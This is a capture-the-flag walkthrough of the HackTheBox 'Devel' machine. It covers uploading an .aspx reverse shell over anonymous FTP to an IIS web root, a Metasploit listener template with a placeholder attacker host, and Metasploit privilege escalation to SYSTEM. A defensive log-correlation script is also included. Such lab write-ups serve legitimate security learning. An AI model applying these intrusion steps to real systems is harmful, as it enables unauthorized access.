Hackthebox Devel Walkthrough

Devel, while relatively simple, demonstrates the security risks associated with some default program configurations. It is a beginner-level machine which can be completed using publicly available exploits.

Image1

  • Let’s Spawn the machine

Image2

# Enumeration


  • Let’s start with the Nmap scan

```
┌──(kali㉿kali)-[~/Desktop/HTB]
└─$ nmap -sC -sV -p- 10.10.10.5 --min-rate=1500
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-08 06:30 EDT
Nmap scan report for 10.10.10.5
Host is up (0.24s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-title: IIS7
|_http-server-header: Microsoft-IIS/7.5
| http-methods: 
|_  Potentially risky methods: TRACE
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 126.28 seconds
```

  • There is not much to explore; it is a very straightforward machine with only two open ports:

Port 21: FTP service
Port 80: Microsoft IIS server

  • We are able to connect to the FTP server using the anonymous login anonymous:anonymous.

Image3

  • Listing the files reveals that this is the root directory of the IIS web server, which means any file we upload through the FTP server can be accessed through the IIS server.

  • Let’s generate an .aspx reverse shell file using msfvenom.

Image4

  • We can upload this file through the FTP server using the put command.

Image5
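
A defender's view of the misconfiguration above, as an added example that is not part of the original walkthrough: it correlates IIS FTP and HTTP logs in W3C format to flag script files stored by an anonymous FTP session and then requested over the web. The log lines, field order, file names and the list of script extensions are constructed assumptions, and it assumes the FTP root and the web root are the same directory, as on this machine.

```python
"""Flag script files uploaded over anonymous FTP and later requested over HTTP (IIS W3C logs)."""
from datetime import datetime

SCRIPT_EXTS = (".aspx", ".asp", ".ashx", ".asmx")  # assumed set of server-executed extensions

# Constructed sample logs (documentation IP ranges, made-up file names).
FTP_LOG = """\
#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status
2025-06-08 10:41:02 198.51.100.7 anonymous PASS *** 230
2025-06-08 10:41:30 198.51.100.7 anonymous STOR /notes.txt 226
2025-06-08 10:41:55 198.51.100.7 anonymous STOR /upload-test.aspx 226
2025-06-08 10:50:10 192.0.2.20 webadmin STOR /default.aspx 226
"""
HTTP_LOG = """\
#Fields: date time cs-method cs-uri-stem c-ip sc-status
2025-06-08 10:40:00 GET /iisstart.htm 198.51.100.7 200
2025-06-08 10:42:20 GET /upload-test.aspx 198.51.100.7 200
2025-06-08 10:51:00 GET /default.aspx 192.0.2.20 200
"""

def parse_w3c(text):
    """Yield one dict per log line, keyed by the names in the #Fields header."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            row = dict(zip(fields, line.split()))
            row["ts"] = datetime.fromisoformat(f"{row['date']} {row['time']}")
            yield row

def find_webroot_uploads(ftp_text, http_text):
    """Return one alert per anonymous script upload, with later HTTP requests for it."""
    alerts = []
    http_rows = list(parse_w3c(http_text))
    for ftp in parse_w3c(ftp_text):
        path = ftp["cs-uri-stem"].lower()
        if (ftp["cs-method"] == "STOR" and ftp["sc-status"] == "226"
                and ftp["cs-username"].lower() == "anonymous" and path.endswith(SCRIPT_EXTS)):
            hits = [h for h in http_rows
                    if h["cs-uri-stem"].lower() == path and h["ts"] >= ftp["ts"]]
            alerts.append({"file": path, "uploader": ftp["c-ip"], "uploaded": ftp["ts"],
                           "requested_by": sorted({h["c-ip"] for h in hits})})
    return alerts

if __name__ == "__main__":
    for alert in find_webroot_uploads(FTP_LOG, HTTP_LOG):
        print(alert)
```

An alert with a non-empty `requested_by` list means the uploaded script was also fetched through IIS; the underlying fix is to disable anonymous write access or move the FTP root out of the web root.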

# Exploitation


  • We can set up the listener in Metasploit if we want, using:

```
use exploit/multi/handler
set payload <payload>
set lhost <attacker-IP>
set lport <listener port>
run
```

  • Then we can access the file we uploaded to the server.

Image6

  • As soon as we visit that file, the reverse shell is triggered on our Metasploit listener, and we get a shell as IIS APPPOOL\Web, similar to www-data on Linux.

Image7

  • Now we can background the session (CTRL+Z) and use Metasploit’s post/multi/recon/local_exploit_suggester module, setting the session ID of our Meterpreter connection.

Image8

  • When we run this module, we get the probable ways to escalate privileges.

Image9

  • Here we use the exploit/windows/local/ntusermndragover module for privilege escalation by setting the session ID and running it. After a little while, we get a shell as NT AUTHORITY\SYSTEM.

Image10

  • Now we can grab the user.txt file.

Image11

  • Similarly, we can get the root hash

```
 Directory of C:\Users\Administrator\Desktop

14/01/2021  12:42 ��    <DIR>          .
14/01/2021  12:42 ��    <DIR>          ..
08/06/2025  01:28 ��                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   5.027.282.944 bytes free

C:\Users\Administrator\Desktop>type root.txt
```

We can also go the manual way if we want.


# Final Thoughts


I hope this blog continues to be helpful in your learning journey! If you find this blog helpful, I’d love to hear your thoughts — my inbox is always open for feedback. Please excuse any typos, and feel free to point them out so I can correct them. Thanks for understanding and happy learning! You can contact me on LinkedIn and Twitter.

This post is licensed under CC BY 4.0 by the author.